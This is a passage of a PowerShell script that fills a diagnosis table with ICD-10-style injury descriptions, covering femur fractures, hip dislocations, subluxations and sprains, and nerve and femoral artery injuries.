$DiagnosisList.Rows.Add("Unspecified fracture of unspecified femur","Unspecified fracture of unspecified femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified femur","Unspecified fracture of unspecified femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified femur","Unspecified fracture of unspecified femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified femur","Unspecified fracture of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified femur","Unspecified fracture of unspecified femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified femur","Unspecified fracture of unspecified femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified femur","Unspecified fracture of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified femur","Unspecified fracture of unspecified femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified femur","Unspecified fracture of unspecified femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified femur","Unspecified fracture of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified femur","Unspecified fracture of unspecified femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified femur","Unspecified fracture of unspecified femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified femur","Unspecified fracture of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified femur","Unspecified fracture of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right femur","Unspecified fracture of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right femur","Unspecified fracture of right femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right femur","Unspecified fracture of right femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right femur","Unspecified fracture of right femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right femur","Unspecified fracture of right femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right femur","Unspecified fracture of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right femur","Unspecified fracture of right femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right femur","Unspecified fracture of right femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right femur","Unspecified fracture of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right femur","Unspecified fracture of right femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right femur","Unspecified fracture of right femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right femur","Unspecified fracture of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right femur","Unspecified fracture of right femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right femur","Unspecified fracture of right femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right femur","Unspecified fracture of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right femur","Unspecified fracture of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left femur","Unspecified fracture of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left femur","Unspecified fracture of left femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left femur","Unspecified fracture of left femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left femur","Unspecified fracture of left femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left femur","Unspecified fracture of left femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left femur","Unspecified fracture of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left femur","Unspecified fracture of left femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left femur","Unspecified fracture of left femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left femur","Unspecified fracture of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left femur","Unspecified fracture of left femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left femur","Unspecified fracture of left femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left femur","Unspecified fracture of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left femur","Unspecified fracture of left femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left femur","Unspecified fracture of left femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left femur","Unspecified fracture of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left femur","Unspecified fracture of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of right hip","Unspecified subluxation of right hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of right hip","Unspecified subluxation of right hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of right hip","Unspecified subluxation of right hip, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of left hip","Unspecified subluxation of left hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of left hip","Unspecified subluxation of left hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of left hip","Unspecified subluxation of left hip, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of unspecified hip","Unspecified subluxation of unspecified hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of unspecified hip","Unspecified subluxation of unspecified hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of unspecified hip","Unspecified subluxation of unspecified hip, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of right hip","Unspecified dislocation of right hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of right hip","Unspecified dislocation of right hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of right hip","Unspecified dislocation of right hip, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of left hip","Unspecified dislocation of left hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of left hip","Unspecified dislocation of left hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of left hip","Unspecified dislocation of left hip, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of unspecified hip","Unspecified dislocation of unspecified hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of unspecified hip","Unspecified dislocation of unspecified hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of unspecified hip","Unspecified dislocation of unspecified hip, sequela") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of right hip","Posterior subluxation of right hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of right hip","Posterior subluxation of right hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of right hip","Posterior subluxation of right hip, sequela") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of left hip","Posterior subluxation of left hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of left hip","Posterior subluxation of left hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of left hip","Posterior subluxation of left hip, sequela") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of unspecified hip","Posterior subluxation of unspecified hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of unspecified hip","Posterior subluxation of unspecified hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of unspecified hip","Posterior subluxation of unspecified hip, sequela") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of right hip","Posterior dislocation of right hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of right hip","Posterior dislocation of right hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of right hip","Posterior dislocation of right hip, sequela") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of left hip","Posterior dislocation of left hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of left hip","Posterior dislocation of left hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of left hip","Posterior dislocation of left hip, sequela") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of unspecified hip","Posterior dislocation of unspecified hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of unspecified hip","Posterior dislocation of unspecified hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of unspecified hip","Posterior dislocation of unspecified hip, sequela") + $null = $DiagnosisList.Rows.Add("Obturator subluxation of right hip","Obturator subluxation of right hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Obturator subluxation of right hip","Obturator subluxation of right hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Obturator subluxation of right hip","Obturator subluxation of right hip, sequela") + $null = $DiagnosisList.Rows.Add("Obturator subluxation of left hip","Obturator subluxation of left hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Obturator subluxation of left hip","Obturator subluxation of left hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Obturator subluxation of left hip","Obturator subluxation of left hip, sequela") + $null = $DiagnosisList.Rows.Add("Obturator subluxation of unspecified hip","Obturator subluxation of unspecified hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Obturator subluxation of unspecified hip","Obturator subluxation of unspecified hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Obturator subluxation of unspecified hip","Obturator subluxation of unspecified hip, sequela") + $null = $DiagnosisList.Rows.Add("Obturator dislocation of right hip","Obturator dislocation of right hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Obturator dislocation of right hip","Obturator dislocation of right hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Obturator dislocation of right hip","Obturator dislocation of right hip, sequela") + $null = $DiagnosisList.Rows.Add("Obturator dislocation of left hip","Obturator dislocation of left hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Obturator dislocation of left hip","Obturator dislocation of left hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Obturator dislocation of left hip","Obturator dislocation of left hip, sequela") + $null = $DiagnosisList.Rows.Add("Obturator dislocation of unspecified hip","Obturator dislocation of unspecified hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Obturator dislocation of unspecified hip","Obturator dislocation of unspecified hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Obturator dislocation of unspecified hip","Obturator dislocation of unspecified hip, sequela") + $null = $DiagnosisList.Rows.Add("Other anterior subluxation of right hip","Other anterior subluxation of right hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Other anterior subluxation of right hip","Other anterior subluxation of right hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other anterior subluxation of right hip","Other anterior subluxation of right hip, sequela") + $null = $DiagnosisList.Rows.Add("Other anterior subluxation of left hip","Other anterior subluxation of left hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Other anterior subluxation of left hip","Other anterior subluxation of left hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other anterior subluxation of left hip","Other anterior subluxation of left hip, sequela") + $null = $DiagnosisList.Rows.Add("Other anterior subluxation of unspecified hip","Other anterior subluxation of unspecified hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Other anterior subluxation of unspecified hip","Other anterior subluxation of unspecified hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other anterior subluxation of unspecified hip","Other anterior subluxation of unspecified hip, sequela") + $null = $DiagnosisList.Rows.Add("Other anterior dislocation of right hip","Other anterior dislocation of right hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Other anterior dislocation of right hip","Other anterior dislocation of right hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other anterior dislocation of right hip","Other anterior dislocation of right hip, sequela") + $null = $DiagnosisList.Rows.Add("Other anterior dislocation of left hip","Other anterior dislocation of left hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Other anterior dislocation of left hip","Other anterior dislocation of left hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other anterior dislocation of left hip","Other anterior dislocation of left hip, sequela") + $null = $DiagnosisList.Rows.Add("Other anterior dislocation of unspecified hip","Other anterior dislocation of unspecified hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Other anterior dislocation of unspecified hip","Other anterior dislocation of unspecified hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other anterior dislocation of unspecified hip","Other anterior dislocation of unspecified hip, sequela") + $null = $DiagnosisList.Rows.Add("Central subluxation of right hip","Central subluxation of right hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Central subluxation of right hip","Central subluxation of right hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Central subluxation of right hip","Central subluxation of right hip, sequela") + $null = $DiagnosisList.Rows.Add("Central subluxation of left hip","Central subluxation of left hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Central subluxation of left hip","Central subluxation of left hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Central subluxation of left hip","Central subluxation of left hip, sequela") + $null = $DiagnosisList.Rows.Add("Central subluxation of unspecified hip","Central subluxation of unspecified hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Central subluxation of unspecified hip","Central subluxation of unspecified hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Central subluxation of unspecified hip","Central subluxation of unspecified hip, sequela") + $null = $DiagnosisList.Rows.Add("Central dislocation of right hip","Central dislocation of right hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Central dislocation of right hip","Central dislocation of right hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Central dislocation of right hip","Central dislocation of right hip, sequela") + $null = $DiagnosisList.Rows.Add("Central dislocation of left hip","Central dislocation of left hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Central dislocation of left hip","Central dislocation of left hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Central dislocation of left hip","Central dislocation of left hip, sequela") + $null = $DiagnosisList.Rows.Add("Central dislocation of unspecified hip","Central dislocation of unspecified hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Central dislocation of unspecified hip","Central dislocation of unspecified hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Central dislocation of unspecified hip","Central dislocation of unspecified hip, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of right hip","Unspecified sprain of right hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of right hip","Unspecified sprain of right hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of right hip","Unspecified sprain of right hip, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of left hip","Unspecified sprain of left hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of left hip","Unspecified sprain of left hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of left hip","Unspecified sprain of left hip, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of unspecified hip","Unspecified sprain of unspecified hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of unspecified hip","Unspecified sprain of unspecified hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of unspecified hip","Unspecified sprain of unspecified hip, sequela") + $null = $DiagnosisList.Rows.Add("Iliofemoral ligament sprain of right hip","Iliofemoral ligament sprain of right hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Iliofemoral ligament sprain of right hip","Iliofemoral ligament sprain of right hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Iliofemoral ligament sprain of right hip","Iliofemoral ligament sprain of right hip, sequela") + $null = $DiagnosisList.Rows.Add("Iliofemoral ligament sprain of left hip","Iliofemoral ligament sprain of left hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Iliofemoral ligament sprain of left hip","Iliofemoral ligament sprain of left hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Iliofemoral ligament sprain of left hip","Iliofemoral ligament sprain of left hip, sequela") + $null = $DiagnosisList.Rows.Add("Iliofemoral ligament sprain of unspecified hip","Iliofemoral ligament sprain of unspecified hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Iliofemoral ligament sprain of unspecified hip","Iliofemoral ligament sprain of unspecified hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Iliofemoral ligament sprain of unspecified hip","Iliofemoral ligament sprain of unspecified hip, sequela") + $null = $DiagnosisList.Rows.Add("Ischiocapsular ligament sprain of right hip","Ischiocapsular ligament sprain of right hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Ischiocapsular ligament sprain of right hip","Ischiocapsular ligament sprain of right hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Ischiocapsular ligament sprain of right hip","Ischiocapsular ligament sprain of right hip, sequela") + $null = $DiagnosisList.Rows.Add("Ischiocapsular ligament sprain of left hip","Ischiocapsular ligament sprain of left hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Ischiocapsular ligament sprain of left hip","Ischiocapsular ligament sprain of left hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Ischiocapsular ligament sprain of left hip","Ischiocapsular ligament sprain of left hip, sequela") + $null = $DiagnosisList.Rows.Add("Ischiocapsular ligament sprain of unspecified hip","Ischiocapsular ligament sprain of unspecified hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Ischiocapsular ligament sprain of unspecified hip","Ischiocapsular ligament sprain of unspecified hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Ischiocapsular ligament sprain of unspecified hip","Ischiocapsular ligament sprain of unspecified hip, sequela") + $null = $DiagnosisList.Rows.Add("Other sprain of right hip","Other sprain of right hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Other sprain of right hip","Other sprain of right hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other sprain of right hip","Other sprain of right hip, sequela") + $null = $DiagnosisList.Rows.Add("Other sprain of left hip","Other sprain of left hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Other sprain of left hip","Other sprain of left hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other sprain of left hip","Other sprain of left hip, sequela") + $null = $DiagnosisList.Rows.Add("Other sprain of unspecified hip","Other sprain of unspecified hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Other sprain of unspecified hip","Other sprain of unspecified hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other sprain of unspecified hip","Other sprain of unspecified hip, sequela") + $null = $DiagnosisList.Rows.Add("Injury of sciatic nerve at hip and thigh level, unspecified leg","Injury of sciatic nerve at hip and thigh level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of sciatic nerve at hip and thigh level, unspecified leg","Injury of sciatic nerve at hip and thigh level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of sciatic nerve at hip and thigh level, unspecified leg","Injury of sciatic nerve at hip and thigh level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Injury of sciatic nerve at hip and thigh level, right leg","Injury of sciatic nerve at hip and thigh level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of sciatic nerve at hip and thigh level, right leg","Injury of sciatic nerve at hip and thigh level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of sciatic nerve at hip and thigh level, right leg","Injury of sciatic nerve at hip and thigh level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Injury of sciatic nerve at hip and thigh level, left leg","Injury of sciatic nerve at hip and thigh level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of sciatic nerve at hip and thigh level, left leg","Injury of sciatic nerve at hip and thigh level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of sciatic nerve at hip and thigh level, left leg","Injury of sciatic nerve at hip and thigh level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Injury of femoral nerve at hip and thigh level, unspecified leg","Injury of femoral nerve at hip and thigh level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of femoral nerve at hip and thigh level, unspecified leg","Injury of femoral nerve at hip and thigh level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of femoral nerve at hip and thigh level, unspecified leg","Injury of femoral nerve at hip and thigh level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Injury of femoral nerve at hip and thigh level, right leg","Injury of femoral nerve at hip and thigh level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of femoral nerve at hip and thigh level, right leg","Injury of femoral nerve at hip and thigh level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of femoral nerve at hip and thigh level, right leg","Injury of femoral nerve at hip and thigh level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Injury of femoral nerve at hip and thigh level, left leg","Injury of femoral nerve at hip and thigh level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of femoral nerve at hip and thigh level, left leg","Injury of femoral nerve at hip and thigh level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of femoral nerve at hip and thigh level, left leg","Injury of femoral nerve at hip and thigh level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Injury of cutaneous sensory nerve at hip and thigh level, unspecified leg","Injury of cutaneous sensory nerve at hip and thigh level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of cutaneous sensory nerve at hip and thigh level, unspecified leg","Injury of cutaneous sensory nerve at hip and thigh level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of cutaneous sensory nerve at hip and thigh level, unspecified leg","Injury of cutaneous sensory nerve at hip and thigh level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Injury of cutaneous sensory nerve at hip and high level, right leg","Injury of cutaneous sensory nerve at hip and high level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of cutaneous sensory nerve at hip and high level, right leg","Injury of cutaneous sensory nerve at hip and high level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of cutaneous sensory nerve at hip and high level, right leg","Injury of cutaneous sensory nerve at hip and high level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Injury of cutaneous sensory nerve at hip and thigh level, left leg","Injury of cutaneous sensory nerve at hip and thigh level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of cutaneous sensory nerve at hip and thigh level, left leg","Injury of cutaneous sensory nerve at hip and thigh level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of cutaneous sensory nerve at hip and thigh level, left leg","Injury of cutaneous sensory nerve at hip and thigh level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at hip and thigh level, right leg","Injury of other nerves at hip and thigh level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at hip and thigh level, right leg","Injury of other nerves at hip and thigh level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at hip and thigh level, right leg","Injury of other nerves at hip and thigh level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at hip and thigh level, left leg","Injury of other nerves at hip and thigh level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at hip and thigh level, left leg","Injury of other nerves at hip and thigh level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at hip and thigh level, left leg","Injury of other nerves at hip and thigh level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at hip and thigh level, unspecified leg","Injury of other nerves at hip and thigh level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at hip and thigh level, unspecified leg","Injury of other nerves at hip and thigh level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at hip and thigh level, unspecified leg","Injury of other nerves at hip and thigh level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at hip and thigh level, unspecified leg","Injury of unspecified nerve at hip and thigh level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at hip and thigh level, unspecified leg","Injury of unspecified nerve at hip and thigh level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at hip and thigh level, unspecified leg","Injury of unspecified nerve at hip and thigh level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at hip and thigh level, right leg","Injury of unspecified nerve at hip and thigh level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at hip and thigh level, right leg","Injury of unspecified nerve at hip and thigh level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at hip and thigh level, right leg","Injury of unspecified nerve at hip and thigh level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at hip and thigh level, left leg","Injury of unspecified nerve at hip and thigh level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at hip and thigh level, left leg","Injury of unspecified nerve at hip and thigh level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at hip and thigh level, left leg","Injury of unspecified nerve at hip and thigh level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of femoral artery, right leg","Unspecified injury of femoral artery, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of femoral artery, right leg","Unspecified injury of femoral artery, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of femoral artery, right leg","Unspecified injury of femoral artery, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of femoral artery, left leg","Unspecified injury of femoral artery, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of femoral artery, left leg","Unspecified injury of femoral artery, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of femoral artery, left leg","Unspecified injury of femoral artery, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of femoral artery, unspecified leg","Unspecified injury of femoral artery, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of femoral artery, unspecified leg","Unspecified injury of femoral artery, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of femoral artery, unspecified leg","Unspecified injury of femoral artery, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Minor laceration of femoral artery, right leg","Minor laceration of femoral artery, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of femoral artery, right leg","Minor laceration of femoral artery, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of femoral artery, right leg","Minor laceration of femoral artery, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Minor laceration of femoral artery, left leg","Minor laceration of femoral artery, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of femoral artery, left leg","Minor laceration of femoral artery, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of femoral artery, left leg","Minor laceration of femoral artery, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Minor laceration of femoral artery, unspecified leg","Minor laceration of femoral artery, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of femoral artery, unspecified leg","Minor laceration of femoral artery, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Minor laceration of femoral artery, unspecified leg","Minor laceration of femoral artery, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Major laceration of femoral artery, right leg","Major laceration of femoral artery, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of femoral artery, right leg","Major laceration of femoral artery, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of femoral artery, right leg","Major laceration of femoral artery, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Major laceration of femoral artery, left leg","Major laceration of femoral artery, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Major laceration of femoral artery, left 